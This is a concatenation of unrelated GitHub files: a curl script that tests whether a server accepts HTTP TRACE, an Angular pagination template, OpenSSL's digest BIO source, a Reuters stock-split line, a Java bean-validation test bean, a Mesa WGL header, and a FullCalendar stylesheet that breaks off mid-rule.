#   $0 <proxy> <target-url>      # via proxy, e.g. $1 == http://127.0.0.1:8080
#
# The header comments documented a proxy argument but the original script
# never honoured it; the two-argument form below adds that path while the
# one-argument form is unchanged.
if [ $# -eq 1 ]; then
	curl -i -I -X TRACE --insecure "$1"
elif [ $# -eq 2 ]; then
	# $1 is the proxy, $2 the target url.
	curl -i -I -X TRACE --insecure -x "$1" "$2"
else
	echo "Please provide a target host."
fi
|
{
"pile_set_name": "Github"
}
|
<!-- Button mode: previous/next buttons, with an optional "current/total" label between them. -->
<ng-template [ngIf]="mode === 'button'">
<div class="weui-pagination__item weui-pagination__prev">
<a weui-button (click)="_goto(-1)" [weui-mini]="mini" weui-type="default" [disabled]="_prevDisabled" [innerHTML]="prevText"></a>
</div>
<!-- Page indicator; suppressed when "simple" is set. -->
<div class="weui-pagination__item weui-pagination__num" *ngIf="!simple">{{ current }}/{{ total }}</div>
<div class="weui-pagination__item weui-pagination__next">
<a weui-button (click)="_goto(1)" [weui-mini]="mini" weui-type="default" [disabled]="_nextDisabled" [innerHTML]="nextText"></a>
</div>
</ng-template>
<!-- Pointer mode: one dot per page; the active dot marks the current page. -->
<div class="weui-pagination__item weui-pagination__num" *ngIf="mode === 'pointer'">
<div *ngFor="let i of _ptArr" class="weui-pagination__dot" [class.weui-pagination__dot-active]="current === i">
<span></span>
</div>
</div>
|
{
"pile_set_name": "Github"
}
|
/* crypto/evp/bio_md.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <errno.h>
#include "cryptlib.h"
#include <openssl/buffer.h>
#include <openssl/evp.h>
/*
* BIO_put and BIO_get both add to the digest, BIO_gets returns the digest
*/
static int md_write(BIO *h, char const *buf, int num);
static int md_read(BIO *h, char *buf, int size);
/*
* static int md_puts(BIO *h, const char *str);
*/
static int md_gets(BIO *h, char *str, int size);
static long md_ctrl(BIO *h, int cmd, long arg1, void *arg2);
static int md_new(BIO *h);
static int md_free(BIO *data);
static long md_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
/*
 * Method table for the message-digest filter BIO. Reads and writes pass
 * through to the next BIO in the chain while being folded into the
 * digest; BIO_gets() finalises and returns the raw digest bytes.
 */
static BIO_METHOD methods_md = {
BIO_TYPE_MD, "message digest",
md_write,
md_read,
NULL, /* md_puts, */
md_gets,
md_ctrl,
md_new,
md_free,
md_callback_ctrl,
};
/* Return the shared method table for message-digest filter BIOs. */
BIO_METHOD *BIO_f_md(void)
{
    return &methods_md;
}
/*
 * Allocate the per-BIO state: an EVP_MD_CTX stored in bi->ptr. The BIO
 * starts uninitialised (init == 0) until a digest is configured via
 * BIO_C_SET_MD / BIO_C_SET_MD_CTX. Returns 1 on success, 0 on failure.
 */
static int md_new(BIO *bi)
{
    EVP_MD_CTX *ctx = EVP_MD_CTX_create();

    if (ctx == NULL)
        return 0;

    bi->init = 0;
    bi->ptr = (char *)ctx;
    bi->flags = 0;
    return 1;
}
/*
 * Release the digest context owned by this BIO and reset its state.
 * Returns 0 for a NULL BIO, 1 otherwise.
 */
static int md_free(BIO *a)
{
    if (a == NULL)
        return 0;

    EVP_MD_CTX_destroy((EVP_MD_CTX *)a->ptr);
    a->ptr = NULL;
    a->init = 0;
    a->flags = 0;
    return 1;
}
/*
 * Read from the next BIO in the chain and, once a digest has been set
 * (b->init), fold every byte read into it. Returns the number of bytes
 * read, 0 when there is nothing to do, or -1 if the digest update fails.
 */
static int md_read(BIO *b, char *out, int outl)
{
    int n;
    EVP_MD_CTX *ctx;

    if (out == NULL)
        return 0;

    ctx = b->ptr;
    if (ctx == NULL || b->next_bio == NULL)
        return 0;

    n = BIO_read(b->next_bio, out, outl);
    if (b->init && n > 0) {
        if (EVP_DigestUpdate(ctx, (unsigned char *)out, (unsigned int)n) <= 0)
            return -1;
    }

    BIO_clear_retry_flags(b);
    BIO_copy_next_retry(b);
    return n;
}
/*
 * Write through to the next BIO in the chain and, once a digest has been
 * set (b->init), fold every byte actually written into it. Returns the
 * number of bytes written, or 0 on failure / when there is nothing to do.
 */
static int md_write(BIO *b, const char *in, int inl)
{
    int n = 0;
    EVP_MD_CTX *ctx;

    if (in == NULL || inl <= 0)
        return 0;

    ctx = b->ptr;
    if (ctx != NULL && b->next_bio != NULL)
        n = BIO_write(b->next_bio, in, inl);

    if (b->init && n > 0) {
        if (!EVP_DigestUpdate(ctx, (const unsigned char *)in, (unsigned int)n)) {
            BIO_clear_retry_flags(b);
            return 0;
        }
    }

    if (b->next_bio != NULL) {
        BIO_clear_retry_flags(b);
        BIO_copy_next_retry(b);
    }
    return n;
}
/*
 * Control operations for the digest BIO. Digest-specific commands
 * (BIO_C_GET_MD, BIO_C_GET_MD_CTX, BIO_C_SET_MD_CTX, BIO_C_SET_MD) are
 * handled here; everything else is forwarded to the next BIO in the
 * chain. Returns 1/positive on success, 0 on failure.
 */
static long md_ctrl(BIO *b, int cmd, long num, void *ptr)
{
EVP_MD_CTX *ctx, *dctx, **pctx;
const EVP_MD **ppmd;
EVP_MD *md;
long ret = 1;
BIO *dbio;
ctx = b->ptr;
switch (cmd) {
case BIO_CTRL_RESET:
/* Restart the digest with the same algorithm, then reset downstream. */
if (b->init)
ret = EVP_DigestInit_ex(ctx, ctx->digest, NULL);
else
ret = 0;
if (ret > 0)
ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
break;
case BIO_C_GET_MD:
/* Report the digest currently in use; fails if none was set. */
if (b->init) {
ppmd = ptr;
*ppmd = ctx->digest;
} else
ret = 0;
break;
case BIO_C_GET_MD_CTX:
/* Hand out the internal context and mark the BIO initialised. */
pctx = ptr;
*pctx = ctx;
b->init = 1;
break;
case BIO_C_SET_MD_CTX:
/* Swap in a caller-supplied context.
 * NOTE(review): the previous context is not freed here -- presumably
 * callers retrieve it first via BIO_C_GET_MD_CTX; confirm usage. */
if (b->init)
b->ptr = ptr;
else
ret = 0;
break;
case BIO_C_DO_STATE_MACHINE:
BIO_clear_retry_flags(b);
ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
BIO_copy_next_retry(b);
break;
case BIO_C_SET_MD:
/* Select the digest algorithm; the BIO becomes usable on success. */
md = ptr;
ret = EVP_DigestInit_ex(ctx, md, NULL);
if (ret > 0)
b->init = 1;
break;
case BIO_CTRL_DUP:
/* Duplicate this BIO's digest state into the destination BIO. */
dbio = ptr;
dctx = dbio->ptr;
if (!EVP_MD_CTX_copy_ex(dctx, ctx))
return 0;
b->init = 1;
break;
default:
ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
break;
}
return (ret);
}
/*
 * The digest BIO has no callback commands of its own; forward every
 * request to the next BIO in the chain (0 if there is none).
 */
static long md_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
{
    if (b->next_bio == NULL)
        return 0;
    return BIO_callback_ctrl(b->next_bio, cmd, fp);
}
/*
 * BIO_gets() on a digest BIO finalises the digest and writes the raw
 * digest bytes (not a NUL-terminated string) into buf. Returns the
 * digest length, 0 if buf is too small, or -1 on finalisation failure.
 * NOTE(review): ctx->digest is dereferenced unchecked -- calling this
 * before a digest is set would crash; confirm callers always set one.
 */
static int md_gets(BIO *bp, char *buf, int size)
{
EVP_MD_CTX *ctx;
unsigned int ret;
ctx = bp->ptr;
if (size < ctx->digest->md_size)
return (0);
if (EVP_DigestFinal_ex(ctx, (unsigned char *)buf, &ret) <= 0)
return -1;
return ((int)ret);
}
/*-
static int md_puts(bp,str)
BIO *bp;
char *str;
{
return(-1);
}
*/
|
{
"pile_set_name": "Github"
}
|
tech data tecd sets three for two split tech data corp said its board declared a three for two stock split payable april to holders of record april reuter
|
{
"pile_set_name": "Github"
}
|
/*******************************************************************************
* Copyright (c) 2017 IBM Corporation and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package defaultbeanvalidation.client.beans;
import java.util.Set;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.validation.ConstraintViolation;
import javax.validation.Validator;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Pattern;
import javax.validation.constraints.Size;
/**
 * Test bean that exercises default bean-validation behaviour via
 * field-level constraint annotations (no deployment descriptor). The
 * check* methods run the container-provided Validator against this
 * instance and verify both passing and failing constraint scenarios,
 * including EL-enabled and EL-disabled message interpolation.
 */
public class AValidationAnnTestBean {
/**
 * Logging support and the static initializer for this class. Used to trace file
 * version information. This will display the current version of the class in the
 * debug log at the time the class is loaded.
 */
private static final String thisClass = AValidationAnnTestBean.class.getName();
private static Logger traceLogger = Logger.getLogger(thisClass);
static {
traceLogger.logp(Level.INFO, thisClass, "", "version : %I%");
}
// No dd for this bean so these are plain fields
String builder = "J and E Builder";
String address = "1625 19th St NE";
@Min(1)
int iMin = 1;
@Max(value = 1, message = "as an EL expresion, ${validatedValue} must be less than {value} but is " +
"${validatedValue > 5 ? 'greater than 5' : 'less than or equal to 5'}")
Integer iMax = 1;
@Size(min = 1)
int[] iMinArray = { 1 };
@Size(max = 1)
Integer[] iMaxArray = { 1 };
@Pattern(regexp = "[a-z][a-z]*", message = "go to your room! - {regexp}")
String pattern = "mypattern";
boolean setToFail = false;
Validator validator;
/**
 * Looks up the container-provided Validator from JNDI (java:comp/Validator).
 *
 * @throws Exception if the JNDI lookup fails
 */
public AValidationAnnTestBean() throws Exception {
Context nContext = new InitialContext();
validator = (Validator) nContext.lookup("java:comp/Validator");
}
/**
 * Puts the bean into a state where exactly one constraint (the @Pattern
 * on {@code pattern}) fails on the next validation pass.
 */
private void setValidationToFail() {
traceLogger.entering(thisClass, "setValidationToFail", this);
// Not specified in the dd so these should not have any effect
builder = null;
address = "BAD";
// This value will cause a validation failure
pattern = "12345";
setToFail = true;
traceLogger.exiting(thisClass, "setValidationToFail" + this);
}
/**
 * Restores all fields to values that satisfy every constraint.
 */
private void resetValidation() {
traceLogger.entering(thisClass, "resetValidation", this);
builder = "J and E Builder";
address = "1625 19th St NE";
// Reset this field that currently should cause a validation error
pattern = "mypattern";
setToFail = false;
traceLogger.exiting(thisClass, "resetValidation" + this);
}
// Getter carries its own @NotNull constraint on the current pattern value.
@NotNull
public String getDesc() {
return pattern;
}
/**
 * Validates this bean in its default (constraint-satisfying) state and
 * throws IllegalStateException if any violations are reported.
 */
public void checkInjectionValidation() {
traceLogger.entering(thisClass, "checkInjectionValidation", this);
resetValidation();
Set<ConstraintViolation<AValidationAnnTestBean>> cvSet = validator.validate(this);
if (!cvSet.isEmpty()) {
String msg = formatConstraintViolations(cvSet);
traceLogger.log(Level.INFO, "Some reason cvSet was not null: " + cvSet + ", " + msg);
throw new IllegalStateException("validation should not have found constraints: " + msg);
}
traceLogger.exiting(thisClass, "checkInjectionValidation ");
}
/**
 * Forces a single @Pattern violation and verifies both the raw message
 * template and the interpolated message; state is restored afterwards.
 */
public void checkInjectionValidationFail() {
traceLogger.entering(thisClass, "checkInjectionValidationFail", this);
try {
setValidationToFail();
Set<ConstraintViolation<AValidationAnnTestBean>> cvSet = validator.validate(this);
if (!cvSet.isEmpty()) {
String msg = formatConstraintViolations(cvSet);
traceLogger.log(Level.INFO, thisClass, "validation failed contraint checking (expected): " + msg);
if (cvSet.size() != 1) {
throw new IllegalStateException("should have found 1 constraint violations but instead found "
+ cvSet.size() + ": " + msg);
}
// There will be only one
for (ConstraintViolation<AValidationAnnTestBean> constraint : cvSet) {
String template = constraint.getMessageTemplate();
String message = constraint.getMessage();
// make sure the template is the same as set in the annotation
if (!template.equals("go to your room! - {regexp}")) {
throw new IllegalStateException("incorrect message template: " + template);
}
// make sure the actual message is "default" interpolated
if (!message.equals("go to your room! - [a-z][a-z]*")) {
throw new IllegalStateException("incorrect message: " + message);
}
}
} else {
throw new IllegalStateException("this bean should have failed validation");
}
} finally {
resetValidation();
}
traceLogger.exiting(thisClass, "checkInjectionValidationFail ");
}
/**
 * Forces a single @Max violation whose message contains EL expressions
 * and verifies the interpolated message differs depending on whether EL
 * evaluation is enabled; iMax is restored afterwards.
 *
 * @param elEnabled whether the runtime is expected to evaluate EL in
 *            constraint messages
 */
public void checkELValidationMessage(boolean elEnabled) {
try {
iMax = 5;
Set<ConstraintViolation<AValidationAnnTestBean>> cvSet = validator.validate(this);
if (!cvSet.isEmpty()) {
String msg = formatConstraintViolations(cvSet);
traceLogger.log(Level.INFO, thisClass, "validation failed contraint checking (expected): " + msg);
if (cvSet.size() != 1) {
throw new IllegalStateException("should have found 1 constraint violations but instead found "
+ cvSet.size() + ": " + msg);
}
// There will be only one
for (ConstraintViolation<AValidationAnnTestBean> constraint : cvSet) {
String template = constraint.getMessageTemplate();
String message = constraint.getMessage();
// make sure the template is the same as set in the annotation
if (!template.equals("as an EL expresion, ${validatedValue} must be less than " +
"{value} but is ${validatedValue > 5 ? 'greater than 5' : 'less than or equal to 5'}")) {
throw new IllegalStateException("incorrect message template: " + template);
}
if (elEnabled) {
// make sure the actual message has all parameters filled in and
// EL expressions evaluated
if (!message.equals("as an EL expresion, 5 must be less than " +
"1 but is less than or equal to 5")) {
throw new IllegalStateException("incorrect message when EL enabled: " + message);
}
} else {
// make sure the actual message has the normal non-EL parameters filled in
if (!message.equals("as an EL expresion, ${validatedValue} must be less than " +
"1 but is ${validatedValue > 5 ? 'greater than 5' : 'less than or equal to 5'}")) {
throw new IllegalStateException("incorrect message when EL disabled: " + message);
}
}
}
} else {
throw new IllegalStateException("this bean should have failed validation");
}
} finally {
iMax = 1;
}
}
@Override
public String toString() {
String result = "iMin:" + iMin + " iMax:" + iMax + " iMinArray:" + iMinArray + " iMaxArray:" + iMaxArray + " pattern:" + pattern
+ " builder:" + builder + " address:" + address + " setToFail:" + setToFail;
return result;
}
/**
 * Convert the constraint violations for use within WAS diagnostic logs.
 *
 * @return a String representation of the constraint violations formatted one per line and uniformly indented.
 */
public String formatConstraintViolations(Set<ConstraintViolation<AValidationAnnTestBean>> cvSet) {
traceLogger.entering(thisClass, "formatConstraintViolations " + cvSet);
StringBuffer msg = new StringBuffer();
for (ConstraintViolation<AValidationAnnTestBean> cv : cvSet) {
msg.append("\n\t" + cv.toString());
}
traceLogger.exiting(thisClass, "formatConstraintViolations " + msg);
return msg.toString();
}
}
|
{
"pile_set_name": "Github"
}
|
/*
* Mesa 3-D graphics library
*
* Copyright (C) 2011 Morgan Armand <morgan.devel@gmail.com>
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
* OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
* ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
* OTHER DEALINGS IN THE SOFTWARE.
*/
#ifndef STW_EXT_CONTEXT_H
#define STW_EXT_CONTEXT_H
#include <windows.h>
#include <GL/gl.h>
/* Function-pointer types matching the wglCreateContext/wglDeleteContext
 * WGL entry points. */
typedef HGLRC (WINAPI *wglCreateContext_t)(HDC hdc);
typedef BOOL (WINAPI *wglDeleteContext_t)(HGLRC hglrc);
/* Hook variables (defined elsewhere) through which the real WGL
 * create/delete functions are invoked. */
extern wglCreateContext_t wglCreateContext_func;
extern wglDeleteContext_t wglDeleteContext_func;
#endif /* STW_EXT_CONTEXT_H */
|
{
"pile_set_name": "Github"
}
|
/*!
* FullCalendar v2.2.0 Stylesheet
* Docs & License: http://arshaw.com/fullcalendar/
* (c) 2013 Adam Shaw
*/
.fc {
direction: ltr;
text-align: left;
}
.fc-rtl {
text-align: right;
}
body .fc { /* extra precedence to overcome jqui */
font-size: 1em;
}
/* Colors
--------------------------------------------------------------------------------------------------*/
.fc-unthemed th,
.fc-unthemed td,
.fc-unthemed hr,
.fc-unthemed thead,
.fc-unthemed tbody,
.fc-unthemed .fc-row,
.fc-unthemed .fc-popover {
border-color: #ddd;
}
.fc-unthemed .fc-popover {
background-color: #fff;
}
.fc-unthemed hr,
.fc-unthemed .fc-popover .fc-header {
background: #eee;
}
.fc-unthemed .fc-popover .fc-header .fc-close {
color: #666;
}
.fc-unthemed .fc-today {
background: #fcf8e3;
}
.fc-highlight { /* when user is selecting cells */
background: #bce8f1;
opacity: .3;
filter: alpha(opacity=30); /* for IE */
}
.fc-bgevent { /* default look for background events */
background: rgb(143, 223, 130);
opacity: .3;
filter: alpha(opacity=30); /* for IE */
}
.fc-nonbusiness { /* default look for non-business-hours areas */
/* will inherit .fc-bgevent's styles */
background: #ccc;
}
/* Icons (inline elements with styled text that mock arrow icons)
--------------------------------------------------------------------------------------------------*/
.fc-icon {
display: inline-block;
font-size: 2em;
line-height: .5em;
height: .5em; /* will make the total height 1em */
font-family: "Courier New", Courier, monospace;
}
.fc-icon-left-single-arrow:after {
content: "\02039";
font-weight: bold;
}
.fc-icon-right-single-arrow:after {
content: "\0203A";
font-weight: bold;
}
.fc-icon-left-double-arrow:after {
content: "\000AB";
}
.fc-icon-right-double-arrow:after {
content: "\000BB";
}
.fc-icon-x:after {
content: "\000D7";
}
/* Buttons (styled <button> tags, normalized to work cross-browser)
--------------------------------------------------------------------------------------------------*/
.fc button {
/* force height to include the border and padding */
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
/* dimensions */
margin: 0;
height: 2.1em;
padding: 0 .6em;
/* text & cursor */
font-size: 1em; /* normalize */
white-space: nowrap;
cursor: pointer;
}
/* Firefox has an annoying inner border */
.fc button::-moz-focus-inner { margin: 0; padding: 0; }
.fc-state-default { /* non-theme */
border: 1px solid;
}
.fc-state-default.fc-corner-left { /* non-theme */
border-top-left-radius: 4px;
border-bottom-left-radius: 4px;
}
.fc-state-default.fc-corner-right { /* non-theme */
border-top-right-radius: 4px;
border-bottom-right-radius: 4px;
}
/* icons in buttons */
.fc button .fc-icon { /* non-theme */
position: relative;
top: .05em; /* seems to be a good adjustment across browsers */
margin: 0 .1em;
}
/*
button states
borrowed from twitter bootstrap (http://twitter.github.com/bootstrap/)
*/
.fc-state-default {
background-color: #f5f5f5;
background-image: -moz-linear-gradient(top, #ffffff, #e6e6e6);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), to(#e6e6e6));
background-image: -webkit-linear-gradient(top, #ffffff, #e6e6e6);
background-image: -o-linear-gradient(top, #ffffff, #e6e6e6);
background-image: linear-gradient(to bottom, #ffffff, #e6e6e6);
background-repeat: repeat-x;
border-color: #e6e6e6 #e6e6e6 #bfbfbf;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
color: #333;
text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
}
.fc-state-hover,
.fc-state-down,
.fc-state-active,
.fc-state-disabled {
color: #333333;
background-color: #e6e6e6;
}
.fc-state-hover {
color: #333333;
text-decoration: none;
background-position: 0 -15px;
-webkit-transition: background-position 0.1s linear;
-moz-transition: background-position 0.1s linear;
-o-transition: background-position 0.1s linear;
transition: background-position 0.1s linear;
}
.fc-state-down,
.fc-state-active {
background-color: #cccccc;
background-image: none;
box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05);
}
.fc-state-disabled {
cursor: default;
background-image: none;
opacity: 0.65;
filter: alpha(opacity=65);
box-shadow: none;
}
/* Buttons Groups
--------------------------------------------------------------------------------------------------*/
.fc-button-group {
display: inline-block;
}
/*
every button that is not first in a button group should scootch over one pixel and cover the
previous button's border...
*/
.fc .fc-button-group > * { /* extra precedence b/c buttons have margin set to zero */
float: left;
margin: 0 0 0 -1px;
}
.fc .fc-button-group > :first-child { /* same */
margin-left: 0;
}
/* Popover
--------------------------------------------------------------------------------------------------*/
.fc-popover {
position: absolute;
box-shadow: 0 2px 6px rgba(0,0,0,.15);
}
.fc-popover .fc-header {
padding: 2px 4px;
}
.fc-popover .fc-header .fc-title {
margin: 0 2px;
}
.fc-popover .fc-header .fc-close {
cursor: pointer;
}
.fc-ltr .fc-popover .fc-header .fc-title,
.fc-rtl .fc-popover .fc-header .fc-close {
float: left;
}
.fc-rtl .fc-popover .fc-header .fc-title,
.fc-ltr .fc-popover .fc-header .fc-close {
float: right;
}
/* unthemed */
.fc-unthemed .fc-popover {
border-width: 1px;
border-style: solid;
}
.fc-unthemed .fc-popover .fc-header .fc-close {
font-size: 25px;
margin-top: 4px;
}
/* jqui themed */
.fc-popover > .ui-widget-header + .ui-widget-content {
border-top: 0; /* where they meet, let the header have the border */
}
/* Misc Reusable Components
--------------------------------------------------------------------------------------------------*/
.fc hr {
height: 0;
margin: 0;
padding: 0 0 2px; /* height is unreliable across browsers, so use padding */
border-style: solid;
border-width: 1px 0;
}
.fc-clear {
clear: both;
}
.fc-bg,
.fc-bgevent-skeleton,
.fc-highlight-skeleton,
.fc-helper-skeleton {
/* these element should always cling to top-left/right corners */
position: absolute;
top: 0;
left: 0;
right: 0;
}
.fc-bg {
bottom: 0; /* stretch bg to bottom edge */
}
.fc-bg table {
height: 100%; /* stretch bg to bottom edge */
}
/* Tables
--------------------------------------------------------------------------------------------------*/
.fc table {
width: 100%;
table-layout: fixed;
border-collapse: collapse;
border-spacing: 0;
font-size: 1em; /* normalize cross-browser */
}
.fc th {
text-align: center;
}
.fc th,
.fc td {
border-style: solid;
border-width: 1px;
padding: 0;
vertical-align: top;
}
.fc td.fc-today {
border-style: double; /* overcome neighboring borders */
}
/* Fake Table Rows
--------------------------------------------------------------------------------------------------*/
.fc .fc-row { /* extra precedence to overcome themes w/ .ui-widget-content forcing a 1px border */
/* no visible border by default. but make available if need be (scrollbar width compensation) */
border-style: solid;
border-width: 0;
}
.fc-row table {
/* don't put left/right border on anything within a fake row.
the outer tbody will worry about this */
border-left: 0 hidden transparent;
border-right: 0 hidden transparent;
/* no bottom borders on rows */
border-bottom: 0 hidden transparent;
}
.fc-row:first-child table {
border-top: 0 hidden transparent; /* no top border on first row */
}
/* Day Row (used within the header and the DayGrid)
--------------------------------------------------------------------------------------------------*/
.fc-row {
position: relative;
}
.fc-row .fc-bg {
z-index: 1;
}
/* highlighting cells & background event skeleton */
.fc-row .fc-bgevent-skeleton,
.fc-row .fc-highlight-skeleton {
bottom: 0; /* stretch skeleton to bottom of row */
}
.fc-row .fc-bgevent-skeleton table,
.fc-row .fc-highlight-skeleton table {
height: 100%; /* stretch skeleton to bottom of row */
}
.fc-row .fc-highlight-skeleton td,
.fc-row .fc-bgevent-skeleton td {
border-color: transparent;
}
.fc-row .fc-bgevent-skeleton {
z-index: 2;
}
.fc-row .fc-highlight-skeleton {
z-index: 3;
}
/*
row content (which contains day/week numbers and events) as well as "helper" (which contains
temporary rendered events).
*/
.fc-row .fc-content-skeleton {
position: relative;
z-index: 4;
padding-bottom: 2px; /* matches the space above the events */
}
.fc-row .fc-helper-skeleton {
z-index: 5;
}
.fc-row .fc-content-skeleton td,
.fc-row .fc-helper-skeleton td {
/* see-through to the background below */
background: none; /* in case <td>s are globally styled */
border-color: transparent;
/* don't put a border between events and/or the day number */
border-bottom: 0;
}
.fc-row .fc-content-skeleton tbody td, /* cells with events inside (so NOT the day number cell) */
.fc-row .fc-helper-skeleton tbody td {
/* don't put a border between event cells */
border-top: 0;
}
/* Scrolling Container
--------------------------------------------------------------------------------------------------*/
.fc-scroller { /* this class goes on elements for guaranteed vertical scrollbars */
overflow-y: scroll;
overflow-x: hidden;
}
.fc-scroller > * { /* we expect an immediate inner element */
position: relative; /* re-scope all positions */
width: 100%; /* hack to force re-sizing this inner element when scrollbars appear/disappear */
overflow: hidden; /* don't let negative margins or absolute positioning create further scroll */
}
/* Global Event Styles
--------------------------------------------------------------------------------------------------*/
.fc-event {
position: relative; /* for resize handle and other inner positioning */
display: block; /* make the <a> tag block */
font-size: .85em;
line-height: 1.3;
border-radius: 3px;
border: 1px solid #3a87ad; /* default BORDER color */
background-color: #3a87ad; /* default BACKGROUND color */
font-weight: normal; /* undo jqui's ui-widget-header bold */
}
/* overpower some of bootstrap's and jqui's styles on <a> tags */
.fc-event,
.fc-event:hover,
.ui-widget .fc-event {
color: #fff; /* default TEXT color */
text-decoration: none; /* if <a> has an href */
}
.fc-event[href],
.fc-event.fc-draggable {
cursor: pointer; /* give events with links and draggable events a hand mouse pointer */
}
.fc-not-allowed, /* causes a "warning" cursor. applied on body */
.fc-not-allowed .fc-event { /* to override an event's custom cursor */
cursor: not-allowed;
}
/* DayGrid events
----------------------------------------------------------------------------------------------------
We use the full "fc-day-grid-event" class instead of using descendants because the event won't
be a descendant of the grid when it is being dragged.
*/
.fc-day-grid-event {
margin: 1px 2px 0; /* spacing between events and edges */
padding: 0 1px;
}
/* events that are continuing to/from another week. kill rounded corners and butt up against edge */
.fc-ltr .fc-day-grid-event.fc-not-start,
.fc-rtl .fc-day-grid-event.fc-not-end {
margin-left: 0;
border-left-width: 0;
padding-left: 1px; /* replace the border with padding */
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.fc-ltr .fc-day-grid-event.fc-not-end,
.fc-rtl .fc-day-grid-event.fc-not-start {
margin-right: 0;
border-right-width: 0;
padding-right: 1px; /* replace the border with padding */
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.fc-day-grid-event > .fc-content { /* force events to be one-line tall */
white-space: nowrap;
overflow: hidden;
}
.fc-day-grid-event .fc-time {
font-weight: bold;
}
/* resize handle (outside of fc-content, so can go outside of bounds) */
.fc-day-grid-event .fc-resizer {
position: absolute;
top: 0;
bottom: 0;
width: 7px;
}
.fc-ltr .fc-day-grid-event .fc-resizer {
right: -3px;
cursor: e-resize;
}
.fc-rtl .fc-day-grid-event .fc-resizer {
left: -3px;
cursor: w-resize;
}
/* Event Limiting
--------------------------------------------------------------------------------------------------*/
/* "more" link that represents hidden events */
a.fc-more {
margin: 1px 3px;
font-size: .85em;
cursor: pointer;
text-decoration: none;
}
a.fc-more:hover {
text-decoration: underline;
}
.fc-limited { /* rows and cells that are hidden because of a "more" link */
display: none;
}
/* popover that appears when "more" link is clicked */
.fc-day-grid .fc-row {
z-index: 1; /* make the "more" popover one higher than this */
}
.fc-more-popover {
z-index: 2;
width: 220px;
}
.fc-more-popover .fc-event-container {
padding: 10px;
}
/* Toolbar
--------------------------------------------------------------------------------------------------*/
.fc-toolbar {
text-align: center;
